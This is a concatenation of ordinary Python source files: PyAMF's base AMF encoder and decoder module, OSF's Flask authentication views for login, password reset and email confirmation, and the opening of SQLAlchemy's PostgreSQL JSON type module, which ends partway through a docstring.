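        # remote_execute() returns a dict with 'stdout' and 'stderr'
        return client.remote_execute('uptime')['stdout']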
|
|
# Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
Provides basic functionality for all pyamf.amf?.[De|E]ncoder classes.
"""
import types
import datetime
import pyamf
from pyamf import util, python, xml
__all__ = [
'IndexedCollection',
'Context',
'Decoder',
'Encoder'
]
try:
unicode
except NameError:
# py3k support
unicode = str
str = bytes
class IndexedCollection(object):
"""
Stores references to objects and provides an API to query them.
All reference checks are done using the builtin C{id} function unless
C{use_hash} is specified as C{True} where the slower but more flexible
C{hash} builtin is used.
@note: All attributes on the instance are private, use the apis only.
"""
def __init__(self, use_hash=False):
if use_hash is True:
self.func = hash
else:
self.func = id
self.clear()
def clear(self):
"""
Clears the collection.
"""
self.list = []
self.dict = {}
def getByReference(self, ref):
"""
Returns an object based on the supplied reference. The C{ref} should
be an C{int}.
If the reference is not found, C{None} will be returned.
"""
try:
return self.list[ref]
except IndexError:
return None
def getReferenceTo(self, obj):
"""
Returns a reference to C{obj} if it is contained within this index.
If the object is not contained within the collection, C{-1} will be
returned.
@param obj: The object to find the reference to.
@return: An C{int} representing the reference, or C{-1} if the object
is not contained within the collection.
"""
return self.dict.get(self.func(obj), -1)
def append(self, obj):
"""
Appends C{obj} to this index.
@note: Uniqueness is not checked
@return: The reference to C{obj} in this index.
"""
h = self.func(obj)
self.list.append(obj)
idx = len(self.list) - 1
self.dict[h] = idx
return idx
def __eq__(self, other):
if isinstance(other, list):
return self.list == other
raise NotImplementedError("cannot compare %s to %r" % (
type(other), self))
def __len__(self):
return len(self.list)
def __getitem__(self, idx):
return self.getByReference(idx)
def __contains__(self, obj):
r = self.getReferenceTo(obj)
return r != -1
def __repr__(self):
t = self.__class__
return '<%s.%s size=%d 0x%x>' % (
t.__module__,
t.__name__,
len(self.list),
id(self))
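# Illustrative usage sketch (not part of the original module): round-tripping
# an object reference through an IndexedCollection. The dictionary below is an
# arbitrary example value.
def _indexed_collection_example():
    refs = IndexedCollection()
    obj = {'spam': 'eggs'}
    idx = refs.append(obj)                      # store and get the index back
    assert refs.getReferenceTo(obj) == idx      # look the reference up again
    assert refs.getByReference(idx) is obj      # resolve the reference
    assert refs.getReferenceTo(object()) == -1  # unknown objects yield -1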
class ByteStringReferenceCollection(IndexedCollection):
"""
There have been rare hash collisions within a single AMF payload causing
corrupt payloads.
Which strings cause collisions is dependent on the python runtime, each
platform might have a slightly different implementation which means that
testing is extremely difficult.
"""
def __init__(self, *args, **kwargs):
super(ByteStringReferenceCollection, self).__init__(use_hash=False)
def getReferenceTo(self, byte_string):
return self.dict.get(byte_string, -1)
def append(self, byte_string):
self.list.append(byte_string)
idx = len(self.list) - 1
self.dict[byte_string] = idx
return idx
class Context(object):
"""
The base context for all AMF [de|en]coding.
@ivar extra: This is a placeholder for any extra contextual data that is
required for different adapters.
@type extra: C{dict}
@ivar _objects: A collection of stored references to objects that have
already been visited by this context.
@type _objects: L{IndexedCollection}
@ivar _class_aliases: Lookup of C{class} -> L{pyamf.ClassAlias} as
determined by L{pyamf.get_class_alias}
@ivar _unicodes: Lookup of utf-8 encoded byte strings -> string objects
(aka strings/unicodes).
@ivar forbid_dtd: Don't allow DTD in XML documents (decode only). By
default PyAMF will not support potentially malicious XML documents
- e.g. XXE.
@ivar forbid_entities: Don't allow entities in XML documents (decode only).
By default PyAMF will not support potentially malicious XML documents
- e.g. XXE.
"""
def __init__(self, forbid_dtd=True, forbid_entities=True):
self._objects = IndexedCollection()
self.forbid_entities = forbid_entities
self.forbid_dtd = forbid_dtd
self.clear()
def clear(self):
"""
Clears the context.
"""
self._objects.clear()
self._class_aliases = {}
self._unicodes = {}
self.extra = {}
def getObject(self, ref):
"""
Gets an object based on a reference.
@type ref: C{int}
@return: The referenced object or C{None} if not found.
"""
return self._objects.getByReference(ref)
def getObjectReference(self, obj):
"""
Gets a reference for an already referenced object.
@return: The reference to the object or C{-1} if the object is not in
the context.
"""
return self._objects.getReferenceTo(obj)
def addObject(self, obj):
"""
Adds a reference to C{obj}.
@return: Reference to C{obj}.
@rtype: C{int}
"""
return self._objects.append(obj)
def getClassAlias(self, klass):
"""
Gets a class alias based on the supplied C{klass}. If one is not found
in the global context, one is created locally.
If you supply a string alias and the class is not registered,
L{pyamf.UnknownClassAlias} will be raised.
@param klass: A class object or string alias.
@return: The L{pyamf.ClassAlias} instance that describes C{klass}
"""
try:
return self._class_aliases[klass]
except KeyError:
pass
try:
alias = self._class_aliases[klass] = pyamf.get_class_alias(klass)
except pyamf.UnknownClassAlias:
if isinstance(klass, python.str_types):
raise
# no alias has been found yet .. check subclasses
alias = util.get_class_alias(klass) or pyamf.ClassAlias
meta = util.get_class_meta(klass)
alias = alias(klass, defer=True, **meta)
self._class_aliases[klass] = alias
return alias
def getStringForBytes(self, s):
"""
Returns the corresponding string for the supplied utf-8 encoded bytes.
If there is no string object, one is created.
@since: 0.6
"""
u = self._unicodes.get(s, None)
if u is not None:
return u
u = self._unicodes[s] = s.decode('utf-8')
return u
def getBytesForString(self, u):
"""
Returns the corresponding utf-8 encoded string for a given unicode
object. If there is no string, one is encoded.
@since: 0.6
"""
s = self._unicodes.get(u, None)
if s is not None:
return s
s = self._unicodes[u] = u.encode('utf-8')
return s
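# Illustrative usage sketch (not part of the original module): the object
# reference cache and the byte-string/unicode cache on the base Context. The
# sample values are arbitrary.
def _context_example():
    ctx = Context()
    obj = ['some', 'value']
    ref = ctx.addObject(obj)                  # remember the object
    assert ctx.getObject(ref) is obj          # reference -> object
    assert ctx.getObjectReference(obj) == ref
    # utf-8 byte string <-> unicode caching used while [de|en]coding strings
    assert ctx.getStringForBytes(b'caf\xc3\xa9') == u'caf\xe9'
    assert ctx.getBytesForString(u'caf\xe9') == b'caf\xc3\xa9'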
class _Codec(object):
"""
Base codec.
@ivar stream: The underlying data stream.
@type stream: L{util.BufferedByteStream}
@ivar context: The context for the encoding.
@ivar strict: Whether the codec should operate in I{strict} mode.
@type strict: C{bool}, default is C{False}.
@ivar timezone_offset: The offset from I{UTC} for any C{datetime} objects
being encoded. Default to C{None} means no offset.
@type timezone_offset: C{datetime.timedelta} or C{int} or C{None}
"""
def __init__(self, stream=None, context=None, strict=False,
timezone_offset=None, forbid_dtd=True, forbid_entities=True):
if isinstance(stream, basestring) or stream is None:
stream = util.BufferedByteStream(stream)
self.stream = stream
self.context = context or self.buildContext(
forbid_dtd=forbid_dtd,
forbid_entities=forbid_entities
)
self.strict = strict
self.timezone_offset = timezone_offset
self._func_cache = {}
def buildContext(self, **kwargs):
"""
A context factory.
"""
raise NotImplementedError
def getTypeFunc(self, data):
"""
Returns a callable based on C{data}. If no such callable can be found,
the default must be to return C{None}.
"""
raise NotImplementedError
class Decoder(_Codec):
"""
Base AMF decoder.
Supports a generator interface. Feed the decoder data using L{send} and
get Python objects out by using L{next}.
@ivar strict: Defines how strict the decoding should be. For the time
being this relates to typed objects in the stream that do not have a
registered alias. Introduced in 0.4.
@type strict: C{bool}
"""
def __init__(self, *args, **kwargs):
_Codec.__init__(self, *args, **kwargs)
self.__depth = 0
def send(self, data):
"""
Add data for the decoder to work on.
"""
self.stream.append(data)
def next(self):
"""
Part of the iterator protocol.
"""
try:
return self.readElement()
except pyamf.EOStream:
# all data was successfully decoded from the stream
raise StopIteration
def finalise(self, payload):
"""
Finalise the payload.
This provides a useful hook for adapters to modify the payload that was
decoded.
Note that this is applied automatically by L{readElement} once the
outermost element has been fully decoded.
"""
for c in pyamf.POST_DECODE_PROCESSORS:
payload = c(payload, self.context.extra)
return payload
def _readElement(self):
"""
Reads an AMF3 element from the data stream.
@raise DecodeError: The ActionScript type is unsupported.
@raise EOStream: No more data left to decode.
"""
pos = self.stream.tell()
try:
t = self.stream.read(1)
except IOError:
raise pyamf.EOStream
try:
func = self._func_cache[t]
except KeyError:
func = self.getTypeFunc(t)
if not func:
raise pyamf.DecodeError("Unsupported ActionScript type %s" % (
hex(ord(t)),))
self._func_cache[t] = func
try:
return func()
except IOError:
self.stream.seek(pos)
raise
def readElement(self):
"""
Reads an AMF3 element from the data stream.
@raise DecodeError: The ActionScript type is unsupported.
@raise EOStream: No more data left to decode.
"""
self.__depth += 1
try:
element = self._readElement()
finally:
self.__depth -= 1
if self.__depth == 0:
element = self.finalise(element)
return element
def __iter__(self):
return self
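# Illustrative sketch (not part of the original module): the generator-style
# decoding interface described above, using a concrete subclass. The use of
# pyamf.amf3.Decoder and the sample bytes (AMF3 integer marker 0x04 followed
# by the U29-encoded value 1) are assumptions for the example only.
def _decoder_generator_example():
    from pyamf import amf3
    decoder = amf3.Decoder()
    decoder.send(b'\x04\x01')   # feed raw AMF3 bytes into the stream
    return decoder.next()       # decode one element (the integer 1)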
class _CustomTypeFunc(object):
"""
Support for custom type mappings when encoding.
"""
def __init__(self, encoder, func):
self.encoder = encoder
self.func = func
def __call__(self, data, **kwargs):
ret = self.func(data, encoder=self.encoder)
if ret is not None:
self.encoder.writeElement(ret)
class Encoder(_Codec):
"""
Base AMF encoder.
When using this to encode arbitrary objects, the only 'public' method is
C{writeElement}; all others are private and are subject to change in future
versions.
The encoder also supports a generator interface. Feed the encoder Python
objects using L{send} and get AMF bytes out using L{next}.
"""
def __init__(self, *args, **kwargs):
_Codec.__init__(self, *args, **kwargs)
self.bucket = []
def _write_type(self, obj, **kwargs):
"""
Subclasses should override this and all write[type] functions
"""
raise NotImplementedError
writeNull = _write_type
writeBytes = _write_type
writeString = _write_type
writeBoolean = _write_type
writeNumber = _write_type
writeList = _write_type
writeUndefined = _write_type
writeDate = _write_type
writeXML = _write_type
writeObject = _write_type
def writeSequence(self, iterable):
"""
        Encodes an iterable. If the iterable's class has a registered alias
        that is marked as external, it is encoded as an object; otherwise it
        is encoded as a list.
"""
try:
alias = self.context.getClassAlias(iterable.__class__)
except (AttributeError, pyamf.UnknownClassAlias):
self.writeList(list(iterable))
return
if alias.external:
            # the iterable is a subclassed list with a registered alias - push
            # to the correct method
self.writeObject(iterable)
return
self.writeList(list(iterable))
def writeGenerator(self, gen):
"""
Iterates over a generator object and encodes all that is returned.
"""
n = getattr(gen, 'next')
while True:
try:
self.writeElement(n())
except StopIteration:
break
def getTypeFunc(self, data):
"""
Returns a callable that will encode C{data} to C{self.stream}. If
C{data} is unencodable, then C{None} is returned.
"""
if data is None:
return self.writeNull
t = type(data)
# try types that we know will work
if t is str or issubclass(t, str):
return self.writeBytes
if t is unicode or issubclass(t, unicode):
return self.writeString
elif t is bool:
return self.writeBoolean
elif t is float:
return self.writeNumber
elif t in python.int_types:
return self.writeNumber
elif t in (list, tuple):
return self.writeList
elif t is types.GeneratorType: # flake8: noqa
return self.writeGenerator
elif t is pyamf.UndefinedType:
return self.writeUndefined
elif t in (datetime.date, datetime.datetime, datetime.time):
return self.writeDate
elif xml.is_xml(data):
return self.writeXML
# check for any overridden types
for type_, func in pyamf.TYPE_MAP.iteritems():
try:
if isinstance(data, type_):
return _CustomTypeFunc(self, func)
except TypeError:
if python.callable(type_) and type_(data):
return _CustomTypeFunc(self, func)
if isinstance(data, (list, tuple)):
return self.writeSequence
# now try some types that won't encode
if t in python.class_types:
# can't encode classes
return None
elif isinstance(data, python.func_types):
# can't encode code objects
return None
        elif isinstance(data, types.ModuleType):
# cannot encode module objects
return None
# well, we tried ..
return self.writeObject
def writeElement(self, data):
"""
Encodes C{data} to AMF. If the data is not able to be matched to an AMF
type, then L{pyamf.EncodeError} will be raised.
"""
key = type(data)
func = None
try:
func = self._func_cache[key]
except KeyError:
func = self.getTypeFunc(data)
if func is None:
raise pyamf.EncodeError('Unable to encode %r (type %r)' % (
data, key))
self._func_cache[key] = func
func(data)
def send(self, element):
self.bucket.append(element)
def next(self):
try:
element = self.bucket.pop(0)
except IndexError:
raise StopIteration
start_pos = self.stream.tell()
self.writeElement(element)
end_pos = self.stream.tell()
self.stream.seek(start_pos)
return self.stream.read(end_pos - start_pos)
def __iter__(self):
return self
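# Illustrative sketch (not part of the original source): with a concrete
# Encoder subclass, send() queues Python objects and each next() call writes
# one element to the stream and returns the bytes it produced:
#
#     encoder = SomeConcreteEncoder()        # hypothetical subclass
#     encoder.send(u'hello')
#     encoder.send([1, 2, 3])
#     amf_bytes = ''.join(encoder)           # drain the bucket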
|
|
# -*- coding: utf-8 -*-
import datetime
import furl
import httplib as http
import markupsafe
from flask import request
from modularodm import Q
from modularodm.exceptions import NoResultsFound
from modularodm.exceptions import ValidationValueError
from framework import forms, status
from framework import auth as framework_auth
from framework.auth import exceptions
from framework.auth import cas, campaigns
from framework.auth import logout as osf_logout
from framework.auth import get_user
from framework.auth.exceptions import DuplicateEmailError, ExpiredTokenError, InvalidTokenError
from framework.auth.core import generate_verification_key
from framework.auth.decorators import collect_auth, must_be_logged_in
from framework.auth.forms import ResendConfirmationForm, ResetPasswordForm, ForgotPasswordForm
from framework.exceptions import HTTPError
from framework.flask import redirect # VOL-aware redirect
from framework.sessions.utils import remove_sessions_for_user
from website import settings, mails, language
from website.models import User
from website.util import web_url_for
from website.util.sanitize import strip_html
from website.util.time import throttle_period_expired
@collect_auth
def reset_password_get(auth, verification_key=None, **kwargs):
"""
View for user to land on the reset password page.
    HTTP Method: GET
:raises: HTTPError(http.BAD_REQUEST) if verification_key is invalid
"""
# If user is already logged in, log user out
if auth.logged_in:
return auth_logout(redirect_url=request.url)
# Check if request bears a valid verification_key
user_obj = get_user(verification_key=verification_key)
if not user_obj:
error_data = {
'message_short': 'Invalid url.',
'message_long': 'The verification key in the URL is invalid or has expired.'
}
raise HTTPError(400, data=error_data)
return {
'verification_key': verification_key,
}
@collect_auth
def reset_password_post(auth, verification_key=None, **kwargs):
"""
View for user to submit reset password form.
HTTP Method: POST
:raises: HTTPError(http.BAD_REQUEST) if verification_key is invalid
"""
# If user is already logged in, log user out
if auth.logged_in:
return auth_logout(redirect_url=request.url)
form = ResetPasswordForm(request.form)
# Check if request bears a valid verification_key
user_obj = get_user(verification_key=verification_key)
if not user_obj:
error_data = {
'message_short': 'Invalid url.',
'message_long': 'The verification key in the URL is invalid or has expired.'
}
raise HTTPError(400, data=error_data)
if form.validate():
# new random verification key, allows CAS to authenticate the user w/o password, one-time only.
# this overwrite also invalidates the verification key generated by forgot_password_post
user_obj.verification_key = generate_verification_key()
user_obj.set_password(form.password.data)
user_obj.save()
status.push_status_message('Password reset', kind='success', trust=False)
# redirect to CAS and authenticate the user with the one-time verification key.
return redirect(cas.get_login_url(
web_url_for('user_account', _absolute=True),
username=user_obj.username,
verification_key=user_obj.verification_key
))
else:
forms.push_errors_to_status(form.errors)
# Don't go anywhere
return {
'verification_key': verification_key
}
@collect_auth
def forgot_password_get(auth, **kwargs):
"""
    View for user to land on the forgot password page.
HTTP Method: GET
"""
# If user is already logged in, redirect to dashboard page.
if auth.logged_in:
return redirect(web_url_for('dashboard'))
return {}
@collect_auth
def forgot_password_post(auth, **kwargs):
"""
View for user to submit forgot password form.
HTTP Method: POST
"""
# If user is already logged in, redirect to dashboard page.
if auth.logged_in:
return redirect(web_url_for('dashboard'))
form = ForgotPasswordForm(request.form, prefix='forgot_password')
if form.validate():
email = form.email.data
status_message = ('If there is an OSF account associated with {0}, an email with instructions on how to '
'reset the OSF password has been sent to {0}. If you do not receive an email and believe '
'you should have, please contact OSF Support. ').format(email)
# check if the user exists
user_obj = get_user(email=email)
if user_obj:
# check forgot_password rate limit
if throttle_period_expired(user_obj.email_last_sent, settings.SEND_EMAIL_THROTTLE):
# new random verification key, allows OSF to check whether the reset_password request is valid,
# this verification key is used twice, one for GET reset_password and one for POST reset_password
# and it will be destroyed when POST reset_password succeeds
user_obj.verification_key = generate_verification_key()
user_obj.email_last_sent = datetime.datetime.utcnow()
user_obj.save()
reset_link = furl.urljoin(
settings.DOMAIN,
web_url_for(
'reset_password_get',
verification_key=user_obj.verification_key
)
)
mails.send_mail(
to_addr=email,
mail=mails.FORGOT_PASSWORD,
reset_link=reset_link
)
status.push_status_message(status_message, kind='success', trust=False)
else:
status.push_status_message('You have recently requested to change your password. Please wait a '
'little while before trying again.', kind='error', trust=False)
else:
status.push_status_message(status_message, kind='success', trust=False)
else:
forms.push_errors_to_status(form.errors)
# Don't go anywhere
return {}
@collect_auth
def auth_login(auth, **kwargs):
"""
This view serves as the entry point for OSF login and campaign login.
HTTP Method: GET
GET '/login/' without any query parameter:
redirect to CAS login page with dashboard as target service
    GET '/login/?logout=true':
        log user out and redirect to CAS login page with redirect_url or next_url as target service
    GET '/login/?campaign=institution':
        if user is logged in, redirect to 'dashboard'
        else show institution login
    GET '/login/?campaign=prereg':
        if user is logged in, redirect to prereg home page
        else show sign up page and notify user to sign in, set next to prereg home page
    GET '/login/?next=next_url':
        if user is logged in, redirect to next_url
        else redirect to CAS login page with next_url as target service
"""
campaign = request.args.get('campaign')
next_url = request.args.get('next')
log_out = request.args.get('logout')
must_login_warning = True
if not campaign and not next_url and not log_out:
if auth.logged_in:
return redirect(web_url_for('dashboard'))
return redirect(cas.get_login_url(web_url_for('dashboard', _absolute=True)))
if campaign:
next_url = campaigns.campaign_url_for(campaign)
if not next_url:
next_url = request.args.get('redirect_url')
must_login_warning = False
if next_url:
# Only allow redirects which are relative root or full domain, disallows external redirects.
if not (next_url[0] == '/'
or next_url.startswith(settings.DOMAIN)
or next_url.startswith(settings.CAS_SERVER_URL)
or next_url.startswith(settings.MFR_SERVER_URL)):
raise HTTPError(http.InvalidURL)
if auth.logged_in:
if not log_out:
if next_url:
return redirect(next_url)
return redirect('dashboard')
# redirect user to CAS for logout, return here w/o authentication
return auth_logout(redirect_url=request.url)
status_message = request.args.get('status', '')
if status_message == 'expired':
status.push_status_message('The private link you used is expired.', trust=False)
status.push_status_message('The private link you used is expired. Please <a href="/settings/account/">'
'resend email.</a>', trust=False)
if next_url and must_login_warning:
status.push_status_message(language.MUST_LOGIN, trust=False)
# set login_url to form action, upon successful authentication specifically w/o logout=True,
# allows for next to be followed or a redirect to the dashboard.
redirect_url = web_url_for('auth_login', next=next_url, _absolute=True)
data = {}
if campaign and campaign in campaigns.CAMPAIGNS:
if (campaign == 'institution' and settings.ENABLE_INSTITUTIONS) or campaign != 'institution':
data['campaign'] = campaign
data['login_url'] = cas.get_login_url(redirect_url)
data['institution_redirect'] = cas.get_institution_target(redirect_url)
data['redirect_url'] = next_url
data['sign_up'] = request.args.get('sign_up', False)
data['existing_user'] = request.args.get('existing_user', None)
return data, http.OK
def auth_logout(redirect_url=None, **kwargs):
"""
Log out, delete current session, delete CAS cookie and delete OSF cookie.
HTTP Method: GET
:param redirect_url: url to redirect user after logout, default is 'goodbye'
:return:
"""
redirect_url = redirect_url or request.args.get('redirect_url') or web_url_for('goodbye', _absolute=True)
# OSF log out, remove current OSF session
osf_logout()
# set redirection to CAS log out (or log in if 'reauth' is present)
if 'reauth' in request.args:
cas_endpoint = cas.get_login_url(redirect_url)
else:
cas_endpoint = cas.get_logout_url(redirect_url)
resp = redirect(cas_endpoint)
# delete OSF cookie
resp.delete_cookie(settings.COOKIE_NAME, domain=settings.OSF_COOKIE_DOMAIN)
return resp
def auth_email_logout(token, user):
"""
When a user is adding an email or merging an account, add the email to the user and log them out.
"""
redirect_url = cas.get_logout_url(service_url=cas.get_login_url(service_url=web_url_for('index', _absolute=True)))
try:
unconfirmed_email = user.get_unconfirmed_email_for_token(token)
except InvalidTokenError:
raise HTTPError(http.BAD_REQUEST, data={
'message_short': 'Bad token',
'message_long': 'The provided token is invalid.'
})
except ExpiredTokenError:
status.push_status_message('The private link you used is expired.')
raise HTTPError(http.BAD_REQUEST, data={
'message_short': 'Expired link',
'message_long': 'The private link you used is expired.'
})
try:
user_merge = User.find_one(Q('emails', 'eq', unconfirmed_email))
except NoResultsFound:
user_merge = False
if user_merge:
remove_sessions_for_user(user_merge)
user.email_verifications[token]['confirmed'] = True
user.save()
remove_sessions_for_user(user)
resp = redirect(redirect_url)
resp.delete_cookie(settings.COOKIE_NAME, domain=settings.OSF_COOKIE_DOMAIN)
return resp
@collect_auth
def confirm_email_get(token, auth=None, **kwargs):
"""
View for email confirmation links. Authenticates and redirects to user settings page if confirmation is successful,
otherwise shows an "Expired Link" error.
HTTP Method: GET
"""
    user = User.load(kwargs['uid'])
    if user is None:
        raise HTTPError(http.NOT_FOUND)
    is_merge = 'confirm_merge' in request.args
    is_initial_confirmation = not user.date_confirmed
    log_out = request.args.get('logout', None)
# if the user is merging or adding an email (they already are an osf user)
if log_out:
return auth_email_logout(token, user)
if auth and auth.user and (auth.user._id == user._id or auth.user._id == user.merged_by._id):
if not is_merge:
# determine if the user registered through a campaign
campaign = campaigns.campaign_for_user(user)
if campaign:
return redirect(campaigns.campaign_url_for(campaign))
# go to home page with push notification
if len(auth.user.emails) == 1 and len(auth.user.email_verifications) == 0:
status.push_status_message(language.WELCOME_MESSAGE, kind='default', jumbotron=True, trust=True)
if token in auth.user.email_verifications:
status.push_status_message(language.CONFIRM_ALTERNATE_EMAIL_ERROR, kind='danger', trust=True)
return redirect(web_url_for('index'))
status.push_status_message(language.MERGE_COMPLETE, kind='success', trust=False)
return redirect(web_url_for('user_account'))
try:
user.confirm_email(token, merge=is_merge)
except exceptions.EmailConfirmTokenError as e:
raise HTTPError(http.BAD_REQUEST, data={
'message_short': e.message_short,
'message_long': e.message_long
})
if is_initial_confirmation:
user.date_last_login = datetime.datetime.utcnow()
user.save()
# send out our welcome message
mails.send_mail(
to_addr=user.username,
mail=mails.WELCOME,
mimetype='html',
user=user
)
# new random verification key, allows CAS to authenticate the user w/o password one-time only.
user.verification_key = generate_verification_key()
user.save()
# redirect to CAS and authenticate the user with a verification key.
return redirect(cas.get_login_url(
request.url,
username=user.username,
verification_key=user.verification_key
))
@must_be_logged_in
def unconfirmed_email_remove(auth=None):
"""
Called at login if user cancels their merge or email add.
HTTP Method: DELETE
"""
user = auth.user
json_body = request.get_json()
try:
given_token = json_body['token']
except KeyError:
raise HTTPError(http.BAD_REQUEST, data={
'message_short': 'Missing token',
'message_long': 'Must provide a token'
})
user.clean_email_verifications(given_token=given_token)
user.save()
return {
'status': 'success',
'removed_email': json_body['address']
}, 200
@must_be_logged_in
def unconfirmed_email_add(auth=None):
"""
Called at login if user confirms their merge or email add.
HTTP Method: PUT
"""
user = auth.user
json_body = request.get_json()
try:
token = json_body['token']
except KeyError:
raise HTTPError(http.BAD_REQUEST, data={
'message_short': 'Missing token',
'message_long': 'Must provide a token'
})
try:
user.confirm_email(token, merge=True)
except exceptions.InvalidTokenError:
        raise HTTPError(http.BAD_REQUEST, data={
'message_short': 'Invalid user token',
'message_long': 'The user token is invalid'
})
except exceptions.EmailConfirmTokenError as e:
raise HTTPError(http.BAD_REQUEST, data={
'message_short': e.message_short,
'message_long': e.message_long
})
user.save()
return {
'status': 'success',
'removed_email': json_body['address']
}, 200
def send_confirm_email(user, email):
"""
    Sends a confirmation email for `user` to the given email address.
:raises: KeyError if user does not have a confirmation token for the given email.
"""
confirmation_url = user.get_confirmation_url(
email,
external=True,
force=True,
)
try:
merge_target = User.find_one(Q('emails', 'eq', email))
except NoResultsFound:
merge_target = None
campaign = campaigns.campaign_for_user(user)
# Choose the appropriate email template to use and add existing_user flag if a merge or adding an email.
if merge_target: # merge account
mail_template = mails.CONFIRM_MERGE
confirmation_url = '{}?logout=1'.format(confirmation_url)
elif user.is_active: # add email
mail_template = mails.CONFIRM_EMAIL
confirmation_url = '{}?logout=1'.format(confirmation_url)
elif campaign: # campaign
mail_template = campaigns.email_template_for_campaign(campaign)
else: # account creation
mail_template = mails.INITIAL_CONFIRM_EMAIL
mails.send_mail(
email,
mail_template,
'plain',
user=user,
confirmation_url=confirmation_url,
email=email,
merge_target=merge_target,
)
@collect_auth
def auth_register(auth, **kwargs):
"""
View for sign-up page.
HTTP Method: GET
"""
# If user is already logged in, redirect to dashboard page.
if auth.logged_in:
return redirect(web_url_for('dashboard'))
return {}, http.OK
def register_user(**kwargs):
"""
Register new user account.
HTTP Method: POST
:param-json str email1:
:param-json str email2:
:param-json str password:
:param-json str fullName:
:param-json str campaign:
:raises: HTTPError(http.BAD_REQUEST) if validation fails or user already exists
"""
# Verify email address match
json_data = request.get_json()
if str(json_data['email1']).lower() != str(json_data['email2']).lower():
raise HTTPError(
http.BAD_REQUEST,
data=dict(message_long='Email addresses must match.')
)
try:
full_name = request.json['fullName']
full_name = strip_html(full_name)
campaign = json_data.get('campaign')
if campaign and campaign not in campaigns.CAMPAIGNS:
campaign = None
user = framework_auth.register_unconfirmed(
request.json['email1'],
request.json['password'],
full_name,
campaign=campaign,
)
framework_auth.signals.user_registered.send(user)
except (ValidationValueError, DuplicateEmailError):
raise HTTPError(
http.BAD_REQUEST,
data=dict(
message_long=language.ALREADY_REGISTERED.format(
email=markupsafe.escape(request.json['email1'])
)
)
)
if settings.CONFIRM_REGISTRATIONS_BY_EMAIL:
send_confirm_email(user, email=user.username)
message = language.REGISTRATION_SUCCESS.format(email=user.username)
return {'message': message}
else:
return {'message': 'You may now log in.'}
@collect_auth
def resend_confirmation_get(auth):
"""
View for user to land on resend confirmation page.
HTTP Method: GET
"""
# If user is already logged in, log user out
if auth.logged_in:
return auth_logout(redirect_url=request.url)
form = ResendConfirmationForm(request.form)
return {
'form': form,
}
@collect_auth
def resend_confirmation_post(auth):
"""
View for user to submit resend confirmation form.
HTTP Method: POST
"""
# If user is already logged in, log user out
if auth.logged_in:
return auth_logout(redirect_url=request.url)
form = ResendConfirmationForm(request.form)
if form.validate():
clean_email = form.email.data
user = get_user(email=clean_email)
status_message = ('If there is an OSF account associated with this unconfirmed email {0}, '
'a confirmation email has been resent to it. If you do not receive an email and believe '
'you should have, please contact OSF Support.').format(clean_email)
kind = 'success'
if user:
try:
send_confirm_email(user, clean_email)
except KeyError:
# already confirmed, redirect to dashboard
status_message = 'This email {0} has already been confirmed.'.format(clean_email)
kind = 'warning'
status.push_status_message(status_message, kind=kind, trust=False)
else:
forms.push_errors_to_status(form.errors)
# Don't go anywhere
return {'form': form}
|
|
# postgresql/json.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from __future__ import absolute_import
import json
import collections
from .base import ischema_names, colspecs
from ... import types as sqltypes
from ...sql import operators
from ...sql import elements
from ... import util
__all__ = ('JSON', 'JSONB')
ASTEXT = operators.custom_op(
"->>", precedence=15, natural_self_precedent=True,
)
JSONPATH_ASTEXT = operators.custom_op(
"#>>", precedence=15, natural_self_precedent=True,
)
HAS_KEY = operators.custom_op(
"?", precedence=15, natural_self_precedent=True
)
HAS_ALL = operators.custom_op(
"?&", precedence=15, natural_self_precedent=True
)
HAS_ANY = operators.custom_op(
"?|", precedence=15, natural_self_precedent=True
)
CONTAINS = operators.custom_op(
"@>", precedence=15, natural_self_precedent=True
)
CONTAINED_BY = operators.custom_op(
"<@", precedence=15, natural_self_precedent=True
)
class JSONPathType(sqltypes.JSON.JSONPathType):
def bind_processor(self, dialect):
def process(value):
assert isinstance(value, collections.Sequence)
tokens = [util.text_type(elem) for elem in value]
return "{%s}" % (", ".join(tokens))
return process
colspecs[sqltypes.JSON.JSONPathType] = JSONPathType
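# Illustrative sketch (not part of the original source): the bind processor
# above renders a Python path sequence as the Postgres array-literal form
# used by the ``#>`` / ``#>>`` operators, e.g. the sequence
# ('key_1', 'key_2', 5) is emitted as the string "{key_1, key_2, 5}".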
class JSON(sqltypes.JSON):
"""Represent the Postgresql JSON type.
This type is a specialization of the Core-level :class:`.types.JSON`
type. Be sure to read the documentation for :class:`.types.JSON` for
important tips regarding treatment of NULL values and ORM use.
.. versionchanged:: 1.1 :class:`.postgresql.JSON` is now a Postgresql-
specific specialization of the new :class:`.types.JSON` type.
The operators provided by the Postgresql version of :class:`.JSON`
include:
* Index operations (the ``->`` operator)::
data_table.c.data['some key']
data_table.c.data[5]
* Index operations returning text (the ``->>`` operator)::
data_table.c.data['some key'].astext == 'some value'
* Index operations with CAST
(equivalent to ``CAST(col ->> ['some key'] AS <type>)``)::
data_table.c.data['some key'].astext.cast(Integer) == 5
* Path index operations (the ``#>`` operator)::
data_table.c.data[('key_1', 'key_2', 5, ..., 'key_n')]
* Path index operations returning text (the ``#>>`` operator)::
data_table.c.data[('key_1', 'key_2', 5, ..., 'key_n')].astext == \
'some value'
.. versionchanged:: 1.1 The :meth:`.ColumnElement.cast` operator on
JSON objects now requires that the :attr:`.JSON.Comparator.astext`
modifier be called explicitly, if the cast works only from a textual
string.
    Index operations return an expression object whose type defaults to
    :class:`.JSON`, so that further JSON-oriented operations may be called
    upon the result type.
Custom serializers and deserializers are specified at the dialect level,
that is using :func:`.create_engine`. The reason for this is that when
using psycopg2, the DBAPI only allows serializers at the per-cursor
or per-connection level. E.g.::
engine = create_engine("postgresql://scott:tiger@localhost/test",
json_serializer=my_serialize_fn,
json_deserializer=my_deserialize_fn
)
When using the psycopg2 dialect, the json_deserializer is registered
against the database using ``psycopg2.extras.register_default_json``.
.. seealso::
:class:`.types.JSON` - Core level JSON type
:class:`.JSONB`
"""
astext_type = sqltypes.Text()
def __init__(self, none_as_null=False, astext_type=None):
"""Construct a :class:`.JSON` type.
:param none_as_null: if True, persist the value ``None`` as a
SQL NULL value, not the JSON encoding of ``null``. Note that
when this flag is False, the :func:`.null` construct can still
be used to persist a NULL value::
from sqlalchemy import null
conn.execute(table.insert(), data=null())
.. versionchanged:: 0.9.8 - Added ``none_as_null``, and :func:`.null`
is now supported in order to persist a NULL value.
.. seealso::
:attr:`.JSON.NULL`
:param astext_type: the type to use for the
:attr:`.JSON.Comparator.astext`
accessor on indexed attributes. Defaults to :class:`.types.Text`.
